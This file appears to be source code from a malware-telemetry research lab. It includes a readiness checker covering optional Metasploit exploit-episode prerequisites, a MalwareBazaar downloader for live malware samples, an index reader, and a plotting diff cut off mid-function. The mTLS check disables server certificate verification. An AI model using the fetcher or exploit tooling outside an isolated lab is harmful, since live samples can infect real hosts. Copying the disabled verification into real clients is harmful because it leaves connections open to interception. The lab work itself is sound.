_ANSI_RED = "\033[31m" if _supports_color() else ""
_ANSI_BOLD = "\033[1m" if _supports_color() else ""
_ANSI_DIM = "\033[2m" if _supports_color() else ""
_ANSI_RESET = "\033[0m" if _supports_color() else ""
@dataclass
class Check:
name: str
status: str # "ok" | "warn" | "fail" | "skip"
detail: str = ""
fix: str = ""
def render(self) -> str:
glyph = {
"ok": f"{_ANSI_GREEN}[✓]{_ANSI_RESET}",
"warn": f"{_ANSI_YELLOW}[!]{_ANSI_RESET}",
"fail": f"{_ANSI_RED}[✗]{_ANSI_RESET}",
"skip": f"{_ANSI_DIM}[-]{_ANSI_RESET}",
}[self.status]
line = f"{glyph} {self.name}"
if self.detail:
line += f" {_ANSI_DIM}{self.detail}{_ANSI_RESET}"
if self.status == "fail" and self.fix:
line += f"\n {_ANSI_BOLD}fix:{_ANSI_RESET} {self.fix}"
return line
@dataclass
class Report:
role: str
checks: list[Check] = field(default_factory=list)
def add(self, c: Check) -> None:
self.checks.append(c)
# Mirror to stdout immediately so a hung check doesn't leave
# the operator without partial info.
if not _JSON_MODE:
print(c.render(), flush=True)
def to_dict(self) -> dict:
return {
"role": self.role,
"checks": [dataclasses.asdict(c) for c in self.checks],
"summary": self.summary(),
}
def summary(self) -> dict:
out = {"ok": 0, "warn": 0, "fail": 0, "skip": 0}
for c in self.checks:
out[c.status] = out.get(c.status, 0) + 1
return out
_JSON_MODE = False
# ---------------------------------------------------------------------------
# helpers
# ---------------------------------------------------------------------------
def _run(cmd: list[str], *, timeout: float = 5.0) -> tuple[int, str, str]:
try:
p = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
return p.returncode, p.stdout.strip(), p.stderr.strip()
except (FileNotFoundError, subprocess.TimeoutExpired) as e:
return -1, "", str(e)
def _path_exists(p: Path) -> bool:
try:
return p.exists()
except PermissionError:
return True # treat unreadable-but-present as present
def _size_str(p: Path) -> str:
try:
return f"{p.stat().st_size // (1024*1024)} MiB"
except (OSError, PermissionError):
return "(stat denied — re-run with sudo for size)"
# ---------------------------------------------------------------------------
# checks — repo
# ---------------------------------------------------------------------------
def check_repo(report: Report, repo_root: Path) -> None:
if not (repo_root / ".git").exists():
report.add(Check(
"repo: .git directory present",
"warn",
detail=f"running from {repo_root} which isn't a git checkout — fine for /opt/cis490 (cp -aT'd) but not the source clone",
))
return
rc, head, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--short=8", "HEAD"])
rc2, branch, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--abbrev-ref", "HEAD"])
rc3, dirty, _ = _run(["git", "-C", str(repo_root), "status", "--porcelain"])
rc4, log, _ = _run(["git", "-C", str(repo_root), "log", "-1", "--format=%s"])
detail = f"{branch}@{head}: {log[:60]}"
if branch != "main":
report.add(Check(
"repo: on main",
"warn",
detail=detail,
fix=f"cd {repo_root} && git fetch && git checkout main && git pull",
))
else:
report.add(Check("repo: on main", "ok", detail=detail))
if dirty:
report.add(Check(
"repo: tree clean",
"warn",
detail=f"{len(dirty.splitlines())} modified or untracked paths",
))
else:
report.add(Check("repo: tree clean", "ok"))
rc5, behind, _ = _run(
["git", "-C", str(repo_root), "rev-list", "--count", "HEAD..@{u}"],
)
if rc5 == 0 and behind.isdigit() and int(behind) > 0:
report.add(Check(
"repo: up to date with origin",
"warn",
detail=f"{behind} commits behind",
fix=f"cd {repo_root} && git pull",
))
elif rc5 == 0:
report.add(Check("repo: up to date with origin", "ok"))
# ---------------------------------------------------------------------------
# checks — install
# ---------------------------------------------------------------------------
def check_install(report: Report, role: str) -> None:
install_root = Path("/opt/cis490")
if not _path_exists(install_root):
report.add(Check(
"install: /opt/cis490 exists",
"fail",
fix=f"sudo $(pwd)/scripts/install-{role}.sh",
))
return
report.add(Check("install: /opt/cis490 exists", "ok"))
venv_python = install_root / ".venv" / "bin" / "python"
if _path_exists(venv_python):
rc, ver, _ = _run([str(venv_python), "--version"])
report.add(Check("install: venv python", "ok",
detail=ver if rc == 0 else "(unreadable)"))
else:
report.add(Check(
"install: venv python",
"fail",
fix=f"sudo /opt/cis490/scripts/install-{role}.sh",
))
cfg_name = "lab-host.toml" if role == "lab-host" else "receiver.toml"
cfg = Path("/etc/cis490") / cfg_name
if _path_exists(cfg):
try:
with open(cfg, "rb") as f:
tomllib.load(f)
report.add(Check(f"config: {cfg}", "ok", detail="parses"))
except PermissionError:
# Mode 0640 root:cis490 is the install default. Doctor often
# runs as the unprivileged user — file is fine, we just
# can't read it from here.
report.add(Check(
f"config: {cfg}",
"warn",
detail="exists, can't read (mode 0640 root:cis490 — re-run with sudo for full audit)",
))
except tomllib.TOMLDecodeError as e:
report.add(Check(
f"config: {cfg}",
"fail",
detail=str(e),
fix=f"sudo $EDITOR {cfg}",
))
else:
report.add(Check(
f"config: {cfg}",
"fail",
fix=f"sudo cp /opt/cis490/etc/{cfg_name}.example {cfg}",
))
if role == "lab-host":
env = Path("/etc/cis490/lab-host.env")
if _path_exists(env):
report.add(Check("config: lab-host.env", "ok"))
else:
report.add(Check(
"config: lab-host.env",
"fail",
fix="sudo /opt/cis490/scripts/install-lab-host.sh "
"# regenerates the env file",
))
# ---------------------------------------------------------------------------
# checks — certs (lab-host)
# ---------------------------------------------------------------------------
def check_certs_lab_host(report: Report) -> None:
base = Path("/etc/cis490/certs")
expected = ["wg-ca.pem", "lab-host.pem", "lab-host.key"]
missing = [n for n in expected if not _path_exists(base / n)]
if missing:
report.add(Check(
f"mTLS: certs at {base}",
"fail",
detail=f"missing: {missing}",
fix="On the Pi: sudo /home/max/.env/wg-pki/scripts/"
"deploy-cis490-cert.sh <host_id> <this-machine-wg-ip>",
))
return
# Verify the chain.
rc, out, err = _run([
"openssl", "verify",
"-CAfile", str(base / "wg-ca.pem"),
str(base / "lab-host.pem"),
])
if rc == 0 and "OK" in out:
report.add(Check("mTLS: cert chain validates", "ok",
detail=out.splitlines()[0]))
else:
report.add(Check(
"mTLS: cert chain validates",
"fail",
detail=err or out,
fix="re-issue the leaf via wg-pki/scripts/deploy-cis490-cert.sh",
))
# ---------------------------------------------------------------------------
# checks — services
# ---------------------------------------------------------------------------
def check_services(report: Report, role: str) -> None:
services = (
["cis490-receiver"]
if role == "receiver"
else ["cis490-shipper", "cis490-orchestrator"]
)
for svc in services:
rc, state, _ = _run(["systemctl", "is-active", svc])
if state == "active":
report.add(Check(f"systemd: {svc} active", "ok"))
elif state == "inactive":
report.add(Check(
f"systemd: {svc} active",
"fail",
detail="inactive",
fix=f"sudo systemctl enable --now {svc}",
))
else:
report.add(Check(
f"systemd: {svc} active",
"fail",
detail=state or "unknown",
fix=f"sudo journalctl -u {svc} --no-pager -n 30",
))
# ---------------------------------------------------------------------------
# checks — network (lab-host)
# ---------------------------------------------------------------------------
def check_network_lab_host(report: Report, cfg_path: Path) -> None:
try:
with open(cfg_path, "rb") as f:
cfg = tomllib.load(f)
except (FileNotFoundError, PermissionError, tomllib.TOMLDecodeError) as e:
report.add(Check("net: lab-host.toml readable", "fail", detail=str(e)))
return
receiver_url = cfg.get("receiver", {}).get("url", "")
if not receiver_url.startswith("https://"):
report.add(Check(
"net: receiver.url present",
"fail",
detail=receiver_url,
fix=f"edit {cfg_path}: receiver.url = 'https://collector.wg'",
))
return
host = receiver_url.split("//", 1)[1].split("/", 1)[0].split(":")[0]
port = 443
if ":" in receiver_url.split("//", 1)[1].split("/", 1)[0]:
port = int(receiver_url.split("//", 1)[1].split("/", 1)[0].split(":")[1])
try:
ip = socket.gethostbyname(host)
report.add(Check(f"net: DNS resolve {host}", "ok",
detail=f"-> {ip}"))
except socket.gaierror as e:
report.add(Check(
f"net: DNS resolve {host}",
"fail",
detail=str(e),
fix=f"echo '10.100.0.1 {host}' | sudo tee -a /etc/hosts "
"# wg-enroll provisions this on real lab hosts",
))
return
try:
with socket.create_connection((host, port), timeout=5):
report.add(Check(f"net: TCP {host}:{port} reachable", "ok"))
except OSError as e:
report.add(Check(
f"net: TCP {host}:{port} reachable",
"fail",
detail=str(e),
fix="check iptmonads is allowing the WG-side 443 + Caddy is up",
))
return
# mTLS handshake — pull the receiver cert paths from cfg.
ca = cfg.get("receiver", {}).get("ca_bundle")
cert = cfg.get("receiver", {}).get("client_cert")
key = cfg.get("receiver", {}).get("client_key")
if not (ca and cert and key):
report.add(Check("net: mTLS handshake to collector.wg",
"skip", detail="cert paths not in config"))
return
try:
ctx = ssl.create_default_context(cafile="/home/max/wg-pki/certs/caddy-root.crt"
if Path("/home/max/wg-pki/certs/caddy-root.crt").exists()
else None)
ctx.load_cert_chain(certfile=cert, keyfile=key)
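# Server certificate verification is disabled below, so this check only
# shows that the client cert/key load and that a TLS session can be
# established; it does not authenticate the receiver.
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE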
with socket.create_connection((host, port), timeout=5) as sock:
with ctx.wrap_socket(sock, server_hostname=host) as ssock:
report.add(Check("net: mTLS handshake to collector.wg",
"ok",
detail=f"cipher={ssock.cipher()[0]}"))
except (ssl.SSLError, OSError, FileNotFoundError) as e:
report.add(Check(
"net: mTLS handshake to collector.wg",
"fail",
detail=str(e),
fix="On the Pi: sudo /home/max/.env/wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip> "
"(rerun cert deploy)",
))
# ---------------------------------------------------------------------------
# checks — VM prereqs (lab-host)
# ---------------------------------------------------------------------------
def check_vm_prereqs(report: Report) -> None:
    if not _path_exists(Path("/dev/kvm")):
        report.add(Check(
            "vm: /dev/kvm",
            "fail",
            fix="ensure KVM kernel module is loaded; on x86 hosts: sudo modprobe kvm-intel || sudo modprobe kvm-amd",
        ))
    else:
        report.add(Check("vm: /dev/kvm", "ok"))
    if shutil.which("qemu-system-x86_64") is None:
        report.add(Check(
            "vm: qemu-system-x86_64 on PATH",
            "fail",
            fix="install qemu-system-x86 via the host package manager",
        ))
    else:
        report.add(Check("vm: qemu-system-x86_64 on PATH", "ok"))
    # Use the same row name for ok and fail so reports line up across runs.
    if shutil.which("zstd") is None:
        report.add(Check(
            "vm: zstd on PATH (shipper compression)",
            "fail",
            fix="install zstd via the host package manager",
        ))
    else:
        report.add(Check("vm: zstd on PATH (shipper compression)", "ok"))
    images = Path("/var/lib/cis490/vm/images")
    alpine = images / "alpine-baseline.qcow2"
    cidata = images / "cidata.iso"
    if _path_exists(alpine):
        report.add(Check(f"vm: {alpine}", "ok",
                         detail=_size_str(alpine)))
    else:
        report.add(Check(
            f"vm: {alpine}",
            "fail",
            fix=f"sudo /opt/cis490/scripts/fetch-alpine-baseline.sh {alpine}",
        ))
    if _path_exists(cidata):
        report.add(Check(f"vm: {cidata}", "ok",
                         detail=_size_str(cidata)))
    else:
        report.add(Check(
            f"vm: {cidata}",
            "fail",
            fix=f"sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/build_cidata.py {cidata}",
        ))
# ---------------------------------------------------------------------------
# checks — Tier 3 (optional)
# ---------------------------------------------------------------------------
def check_tier3(report: Report) -> None:
if shutil.which("msfrpcd") is None:
report.add(Check(
"tier3: msfrpcd on PATH",
"warn",
detail="optional — only needed for real exploit episodes",
fix="sudo /opt/cis490/scripts/install-msfrpcd.sh",
))
else:
report.add(Check("tier3: msfrpcd on PATH", "ok"))
# Probe whether msfrpcd is actually listening (tier-3 fleet
# dispatch checks the same thing).
msfrpcd_listening = False
try:
with socket.create_connection(("127.0.0.1", 55553), timeout=0.5):
msfrpcd_listening = True
except OSError:
pass
if msfrpcd_listening:
report.add(Check("tier3: msfrpcd listening on 127.0.0.1:55553", "ok"))
else:
report.add(Check(
"tier3: msfrpcd listening on 127.0.0.1:55553",
"warn",
detail="optional — fleet falls back to Tier 2 when down",
fix="sudo systemctl enable --now cis490-msfrpcd",
))
# Module catalog parses + at least one same-socket entry.
modules_dir = Path("/opt/cis490/exploits/modules")
if modules_dir.exists():
try:
from exploits.modules import load_module_configs as _load
catalog = _load(modules_dir)
same_socket = [k for k, v in catalog.items() if not v.requires_bridge]
report.add(Check(
"tier3: module catalog parses",
"ok",
detail=f"{len(catalog)} modules, {len(same_socket)} same-socket "
f"({len(catalog) - len(same_socket)} need BRIDGE)",
))
except Exception as e:
report.add(Check(
"tier3: module catalog parses",
"fail",
detail=str(e),
fix="check exploits/modules/*.toml syntax",
))
images = Path("/var/lib/cis490/vm/images")
msf2 = images / "metasploitable2.qcow2"
if _path_exists(msf2):
report.add(Check(f"tier3: {msf2}", "ok",
detail=_size_str(msf2)))
else:
report.add(Check(
f"tier3: {msf2}",
"warn",
detail="optional — needed for Tier-3 episodes",
fix="IMAGE_URL=… IMAGE_SHA256=… sudo /opt/cis490/scripts/fetch-metasploitable2.sh",
))
def check_bridge(report: Report) -> None:
"""Bridge readiness — pcap (source 4) + reverse/bind callback
payloads both need this. Without it, Tier-3 episodes that pick
callback modules will fire but the session never lands."""
rc, out, _ = _run(["ip", "-br", "link", "show", "br-malware"])
if rc == 0 and "br-malware" in out:
if "UP" in out or "UNKNOWN" in out:
report.add(Check("bridge: br-malware up", "ok", detail=out.strip()[:80]))
else:
report.add(Check(
"bridge: br-malware up",
"warn",
detail=out.strip()[:80],
fix="sudo ip link set br-malware up",
))
else:
report.add(Check(
"bridge: br-malware exists",
"warn",
detail="optional — pcap capture + callback-payload Tier-3 "
"modules require it",
fix="sudo /opt/cis490/vm/setup_bridge.sh",
))
# ---------------------------------------------------------------------------
# checks — end to end (lab-host)
# ---------------------------------------------------------------------------
def check_end_to_end(report: Report) -> None:
cfg = "/etc/cis490/lab-host.toml"
if not _path_exists(Path(cfg)):
report.add(Check("e2e: cis490-shipper --ping", "skip",
detail="no lab-host.toml"))
return
rc, out, err = _run([
"/opt/cis490/.venv/bin/python", "-m", "shipper",
"--config", cfg, "--ping",
], timeout=15.0)
if rc == 0 and '"ok": true' in out:
report.add(Check("e2e: cis490-shipper --ping", "ok",
detail="200 OK"))
else:
report.add(Check(
"e2e: cis490-shipper --ping",
"fail",
detail=(out or err)[:200],
fix="paste this row's detail into a Forgejo issue or to the operator",
))
# ---------------------------------------------------------------------------
# main
# ---------------------------------------------------------------------------
def main(argv: list[str] | None = None) -> int:
global _JSON_MODE
p = argparse.ArgumentParser(prog="cis490-doctor")
p.add_argument("--role", choices=("lab-host", "receiver"), default="lab-host")
p.add_argument("--json", action="store_true",
help="machine-readable output (suppresses progressive printing)")
p.add_argument("--no-tier3", action="store_true",
help="skip the optional Tier-3 prerequisite checks")
args = p.parse_args(argv)
_JSON_MODE = args.json
repo_root = Path(__file__).resolve().parent.parent
if not _JSON_MODE:
print(f"{_ANSI_BOLD}cis490-doctor{_ANSI_RESET} role={args.role} repo={repo_root}\n")
report = Report(role=args.role)
check_repo(report, repo_root)
check_install(report, args.role)
if args.role == "lab-host":
check_certs_lab_host(report)
check_services(report, args.role)
if args.role == "lab-host":
check_network_lab_host(report, Path("/etc/cis490/lab-host.toml"))
check_vm_prereqs(report)
check_bridge(report)
if not args.no_tier3:
check_tier3(report)
check_end_to_end(report)
summary = report.summary()
if _JSON_MODE:
json.dump(report.to_dict(), sys.stdout, indent=2)
print()
else:
print()
print(f"{_ANSI_BOLD}summary:{_ANSI_RESET} "
f"{_ANSI_GREEN}{summary['ok']} ok{_ANSI_RESET}, "
f"{_ANSI_YELLOW}{summary['warn']} warn{_ANSI_RESET}, "
f"{_ANSI_RED}{summary['fail']} fail{_ANSI_RESET}, "
f"{_ANSI_DIM}{summary['skip']} skip{_ANSI_RESET}")
if summary["fail"]:
print(
f"\n{_ANSI_BOLD}{_ANSI_RED}NOT READY.{_ANSI_RESET} "
"Run the `fix:` commands above in order, then re-run "
"`cis490-doctor`. When all rows are green/yellow, "
"episodes will start shipping to the Pi."
)
else:
print(
f"\n{_ANSI_BOLD}{_ANSI_GREEN}READY.{_ANSI_RESET} "
"Episodes should be flowing. Watch:\n"
" sudo journalctl -u cis490-shipper -f\n"
" ssh <pi> 'sudo tail -f /var/lib/cis490/index.jsonl'"
)
return 1 if summary["fail"] else 0
if __name__ == "__main__":
sys.exit(main())
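
The reachability checks in the doctor (collector TCP port, msfrpcd on 127.0.0.1:55553) share one pattern: open a TCP connection with a short timeout and treat any `OSError` as "not listening". A minimal sketch of that pattern as a standalone helper follows. `tcp_listening` is a hypothetical name used for illustration, not a function in `cis490_doctor`.

```python
import socket


def tcp_listening(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if a TCP connect to (host, port) succeeds within timeout.

    Hypothetical helper: it mirrors the probe style used by the doctor
    checks but is not part of the repository.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Refused connections, timeouts, and name-resolution failures
        # are all OSError subclasses.
        return False


if __name__ == "__main__":
    # Bind an ephemeral local listener so the demo needs no external service.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
        print(tcp_listening("127.0.0.1", srv.getsockname()[1]))
```

Returning a plain bool keeps the probe reusable; the caller decides whether a closed port is a `fail` (collector) or only a `warn` (optional Tier-3 service).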

142
tools/fetch_sample.py Normal file

@ -0,0 +1,142 @@
"""Fetch a malware sample by sha256 from MalwareBazaar.

Lands the binary at ``samples/store/<sha256>`` (gitignored), verifies
the hash on the way in, and prints the resulting path on stdout.

Usage:
    MALWAREBAZAAR_API_KEY=... uv run python tools/fetch_sample.py <sha256>

MalwareBazaar requires a free API key as of late 2023; sign up at
https://bazaar.abuse.ch and either pass the key via the environment or
place it in ``samples/.bazaar.token`` (mode 0600, gitignored). The
downloaded zip is encrypted with the password ``infected``, per the MB
convention.

The fetcher is intentionally read-only over the network (no upload,
no metadata posted), so a fleet whose WG mesh has tightly firewalled
egress can run it once on a build host and rsync the resulting
``samples/store/`` directory across the lab hosts.
"""
from __future__ import annotations
import argparse
import hashlib
import os
import sys
import urllib.parse
import urllib.request
import zipfile
from pathlib import Path
MB_ENDPOINT = "https://mb-api.abuse.ch/api/v1/"
MB_ZIP_PASSWORD = b"infected"
def _read_api_key(repo_root: Path) -> str | None:
env = os.environ.get("MALWAREBAZAAR_API_KEY")
if env:
return env.strip()
token = repo_root / "samples" / ".bazaar.token"
if token.exists():
return token.read_text().strip()
return None
def fetch_sample(
sha256: str,
out_dir: Path,
api_key: str,
*,
timeout_s: float = 60.0,
) -> Path:
if len(sha256) != 64 or not all(c in "0123456789abcdef" for c in sha256.lower()):
raise ValueError(f"sha256 must be 64 hex chars, got {sha256!r}")
sha256 = sha256.lower()
out_dir.mkdir(parents=True, exist_ok=True)
target = out_dir / sha256
if target.exists():
actual = hashlib.sha256(target.read_bytes()).hexdigest()
if actual == sha256:
return target
target.unlink() # tampered or partial; refetch.
body = urllib.parse.urlencode({
"query": "get_file",
"sha256_hash": sha256,
}).encode("utf-8")
req = urllib.request.Request(
MB_ENDPOINT,
data=body,
headers={
"Auth-Key": api_key,
"User-Agent": "cis490-fetcher/0",
},
method="POST",
)
with urllib.request.urlopen(req, timeout=timeout_s) as r:
payload = r.read()
if not payload.startswith(b"PK"):
raise RuntimeError(
f"MalwareBazaar returned non-zip response (first 200 bytes): "
f"{payload[:200]!r}"
)
zip_path = out_dir / f"{sha256}.zip"
zip_path.write_bytes(payload)
try:
with zipfile.ZipFile(zip_path) as zf:
zf.setpassword(MB_ZIP_PASSWORD)
names = zf.namelist()
if not names:
raise RuntimeError(f"{sha256}: empty zip")
with zf.open(names[0]) as src, target.open("wb") as dst:
dst.write(src.read())
finally:
zip_path.unlink(missing_ok=True)
actual = hashlib.sha256(target.read_bytes()).hexdigest()
if actual != sha256:
target.unlink()
raise RuntimeError(f"sha256 mismatch: expected {sha256}, got {actual}")
return target
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="fetch_sample")
p.add_argument("sha256")
p.add_argument(
"--out-dir",
type=Path,
default=None,
help="Where to drop <sha256> (default: samples/store/ relative to repo)",
)
args = p.parse_args(argv)
repo_root = Path(__file__).resolve().parent.parent
out_dir = args.out_dir or (repo_root / "samples" / "store")
api_key = _read_api_key(repo_root)
if not api_key:
print(
"no MalwareBazaar API key — set MALWAREBAZAAR_API_KEY or write "
"samples/.bazaar.token (mode 0600). Register at "
"https://bazaar.abuse.ch.",
file=sys.stderr,
)
return 2
try:
path = fetch_sample(args.sha256, out_dir, api_key)
except Exception as e:
print(f"fetch failed: {e}", file=sys.stderr)
return 1
print(path)
return 0
if __name__ == "__main__":
sys.exit(main())

136
tools/index_reader.py Normal file

@ -0,0 +1,136 @@
"""Read + filter the receiver's ``index.jsonl``.
Usage:
# All episodes from one host:
cis490-index --host lab-host-1
# All episodes for a particular sample:
cis490-index --sample xmrig-cryptominer
# Today's episodes, sorted by size:
cis490-index --since 2026-04-30 --sort size
# Group/count by host:
cis490-index --count-by host_id
The index file is the closest thing to a database the receiver has
until we move to Postgres/Timescale. This tool is the temporary CLI
view over it; it's intentionally read-only and never opens episode
tarballs (just the index rows).
"""
from __future__ import annotations
import argparse
import json
import sys
from collections import Counter
from datetime import datetime, timezone
from pathlib import Path
DEFAULT_INDEX = "/var/lib/cis490/index.jsonl"
def _parse_since(s: str) -> datetime:
# Accept ISO-8601 with or without time.
for fmt in ("%Y-%m-%dT%H:%M:%S%z", "%Y-%m-%d", "%Y-%m-%dT%H:%M:%S"):
try:
dt = datetime.strptime(s, fmt)
if dt.tzinfo is None:
dt = dt.replace(tzinfo=timezone.utc)
return dt
except ValueError:
continue
# Last resort: fromisoformat which handles a wider range in 3.11+.
dt = datetime.fromisoformat(s)
if dt.tzinfo is None:
dt = dt.replace(tzinfo=timezone.utc)
return dt
def _row_time(row: dict) -> datetime | None:
s = row.get("received_at_wall")
if not s:
return None
try:
return datetime.fromisoformat(s.replace("Z", "+00:00"))
except ValueError:
return None
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="cis490-index")
p.add_argument("--index", default=DEFAULT_INDEX,
help=f"path to index.jsonl (default {DEFAULT_INDEX})")
p.add_argument("--host", help="only rows from this host_id")
p.add_argument("--sample",
help="only rows whose meta.sample.name matches "
"(requires meta.json from a recent commit)")
p.add_argument("--since", help="ISO date or datetime; only rows received on/after")
p.add_argument("--until", help="ISO date or datetime; only rows received before")
p.add_argument("--sort", choices=("time", "size", "host"), default="time")
p.add_argument("--count-by",
choices=("host_id", "schema_version"),
help="instead of printing rows, group + count by this field")
p.add_argument("--limit", type=int, default=0,
help="cap output rows (0 = all)")
args = p.parse_args(argv)
path = Path(args.index)
if not path.exists():
print(f"no index at {path}", file=sys.stderr)
return 2
since = _parse_since(args.since) if args.since else None
until = _parse_since(args.until) if args.until else None
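    rows: list[dict] = []
    with path.open() as f:
        for line in f:
            line = line.strip()
            if not line:
                continue
            try:
                row = json.loads(line)
            except json.JSONDecodeError:
                continue
            if args.host and row.get("host_id") != args.host:
                continue
            # --sample was parsed but never applied. ASSUMPTION: the
            # receiver copies meta.json into the row under "meta", as the
            # --sample help text implies; rows without it never match.
            if args.sample:
                meta = row.get("meta")
                sample = meta.get("sample") if isinstance(meta, dict) else None
                name = sample.get("name") if isinstance(sample, dict) else None
                if name != args.sample:
                    continue
            if since or until:
                t = _row_time(row)
                if t is None:
                    continue
                if since and t < since:
                    continue
                if until and t >= until:
                    continue
            rows.append(row)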
if args.count_by:
counts = Counter(r.get(args.count_by, "<missing>") for r in rows)
for k, n in counts.most_common():
print(f"{n:>6} {k}")
return 0
sort_keys = {
"time": lambda r: r.get("received_at_wall", ""),
"size": lambda r: r.get("size_bytes", 0),
"host": lambda r: r.get("host_id", ""),
}
rows.sort(key=sort_keys[args.sort])
if args.limit:
rows = rows[-args.limit:] if args.sort != "size" else rows[:args.limit]
# Print TSV-ish for quick eyeballing + downstream pipe-friendliness.
print("received_at_wall\thost_id\tepisode_id\tsize_bytes\tschema_version\tsha256")
for r in rows:
print("\t".join(str(r.get(k, "")) for k in
("received_at_wall", "host_id", "episode_id",
"size_bytes", "schema_version", "sha256")))
return 0
if __name__ == "__main__":
sys.exit(main())
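
The filter-then-count path behind `--since` and `--count-by` can be exercised without a real index file. The sketch below works under assumptions: `count_rows` is a hypothetical function, and the rows in the demo are made up for illustration. Only the field names `host_id` and `received_at_wall` come from the tool itself.

```python
import json
from collections import Counter
from datetime import datetime, timezone


def count_rows(lines, *, since=None, count_by="host_id"):
    """Count parseable index rows by one field, optionally filtering by time."""
    counts = Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            row = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip corrupt lines, as the CLI does
        if not isinstance(row, dict):
            continue
        if since is not None:
            stamp = row.get("received_at_wall")
            if not stamp:
                continue
            try:
                t = datetime.fromisoformat(stamp.replace("Z", "+00:00"))
            except ValueError:
                continue
            if t.tzinfo is None:
                # Treat naive timestamps as UTC so the comparison is valid.
                t = t.replace(tzinfo=timezone.utc)
            if t < since:
                continue
        counts[row.get(count_by, "<missing>")] += 1
    return counts


if __name__ == "__main__":
    demo = [  # synthetic rows, for illustration only
        '{"host_id": "lab-host-1", "received_at_wall": "2026-04-30T10:00:00Z"}',
        '{"host_id": "lab-host-2", "received_at_wall": "2026-04-29T10:00:00Z"}',
        "not json",
    ]
    cutoff = datetime(2026, 4, 30, tzinfo=timezone.utc)
    for host, n in count_rows(demo, since=cutoff).most_common():
        print(f"{n:>6} {host}")
```

Taking an iterable of lines rather than a path makes the logic easy to test and leaves file handling to the caller.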


@ -1,8 +1,19 @@
"""Plot a single episode's envelope.
-Reads ``telemetry-proc.jsonl`` and ``labels.jsonl`` from an episode directory
-and renders a 3-panel chart: CPU%, RSS, IO write rate, with phase bands
-underneath.
+Renders a multi-panel chart from whatever telemetry the episode dir
+contains, with phase bands underneath each panel:
+  panel 1  host /proc CPU%        (source 1, always)
+  panel 2  host /proc RSS         (source 1, always)
+  panel 3  host /proc IO write    (source 1, always)
+  panel 4  QMP block I/O ops      (source 2, if telemetry-qmp.jsonl)
+  panel 5  perf IPC + miss-rate   (source 3, if telemetry-perf.jsonl)
+  panel 6  bridge pcap pkts/s     (source 4, if netflow.jsonl)
+  panel 7  guest agent CPU/load   (source 5, if telemetry-guest.jsonl)
+Missing sources are silently skipped: a Tier-1 episode dir with only
+proc telemetry still gets the original 3-panel plot. A Tier-3+ run
+with all five sources gets the full stack on a shared time axis.
Two modes:
@ -103,21 +114,77 @@ def main() -> int:
         end = labels[i + 1]["t_mono_ns"] / 1e9 if i + 1 < len(labels) else end_t
         spans.append((start, end, lbl["phase"]))
-    fig, axes = plt.subplots(3, 1, figsize=(13, 8), sharex=True)
+    # Discover optional sources.
+    qmp_rows = _load_jsonl(d / "telemetry-qmp.jsonl") if (d / "telemetry-qmp.jsonl").exists() else []
+    perf_rows = _load_jsonl(d / "telemetry-perf.jsonl") if (d / "telemetry-perf.jsonl").exists() else []
+    netflow_rows = _load_jsonl(d / "netflow.jsonl") if (d / "netflow.jsonl").exists() else []
+    guest_rows = _load_jsonl(d / "telemetry-guest.jsonl") if (d / "telemetry-guest.jsonl").exists() else []
-    axes[0].plot(t, cpu_pct, color="#222222", linewidth=1.0)
-    axes[0].set_ylabel("CPU %")
-    axes[0].set_ylim(-3, 110)
-    axes[0].grid(alpha=0.25)
+    panels: list[tuple[str, callable]] = []  # (ylabel, plot_fn(ax))
+    panels.append(("CPU % (proc)", lambda ax: (
+        ax.plot(t, cpu_pct, color="#222222", linewidth=1.0),
+        ax.set_ylim(-3, 110),
+    )))
+    panels.append(("RSS (MiB)", lambda ax: ax.plot(t, rss_mib, color="#222222", linewidth=1.0)))
+    panels.append(("IO write (KiB/s)", lambda ax: ax.plot(t, io_kb_s, color="#222222", linewidth=1.0)))
-    axes[1].plot(t, rss_mib, color="#222222", linewidth=1.0)
-    axes[1].set_ylabel("RSS (MiB)")
-    axes[1].grid(alpha=0.25)
+    if qmp_rows:
+        qt = [r["t_mono_ns"] / 1e9 for r in qmp_rows]
+        # Sum block I/O ops across devices.
+        wr_ops = []
+        rd_ops = []
+        for r in qmp_rows:
+            bs = r.get("blockstats") or {}
+            wr_ops.append(sum(d.get("wr_ops", 0) for d in bs.values()))
+            rd_ops.append(sum(d.get("rd_ops", 0) for d in bs.values()))
+        panels.append(("QMP block ops (cum)", lambda ax: (
+            ax.plot(qt, wr_ops, color="#cc4444", linewidth=1.0, label="wr_ops"),
+            ax.plot(qt, rd_ops, color="#4488cc", linewidth=1.0, label="rd_ops"),
+            ax.legend(loc="upper left", fontsize=8),
+        )))
-    axes[2].plot(t, io_kb_s, color="#222222", linewidth=1.0)
-    axes[2].set_ylabel("IO write (KiB/s)")
-    axes[2].set_xlabel("time (s)")
-    axes[2].grid(alpha=0.25)
+    if perf_rows:
+        pt = [r["t_mono_ns"] / 1e9 for r in perf_rows]
+        ipc = [r.get("ipc") or 0 for r in perf_rows]
+        miss = [r.get("cache_miss_rate") or 0 for r in perf_rows]
+        panels.append(("perf IPC / miss-rate", lambda ax: (
+            ax.plot(pt, ipc, color="#222222", linewidth=1.0, label="IPC"),
+            ax.plot(pt, miss, color="#cc4444", linewidth=1.0, label="cache miss rate"),
+            ax.legend(loc="upper right", fontsize=8),
+        )))
+    if netflow_rows:
+        nt = [r["t_mono_ns"] / 1e9 for r in netflow_rows]
+        pkts = [(r.get("pkts_in", 0) + r.get("pkts_out", 0)) for r in netflow_rows]
+        synf = [r.get("syn_count", 0) for r in netflow_rows]
+        panels.append(("bridge pkts / SYNs (per 100 ms)", lambda ax: (
+            ax.plot(nt, pkts, color="#222222", linewidth=1.0, label="pkts"),
+            ax.plot(nt, synf, color="#cc4444", linewidth=1.0, label="syn"),
+            ax.legend(loc="upper right", fontsize=8),
+        )))
+    if guest_rows:
+        gt = [r["t_mono_ns"] / 1e9 for r in guest_rows]
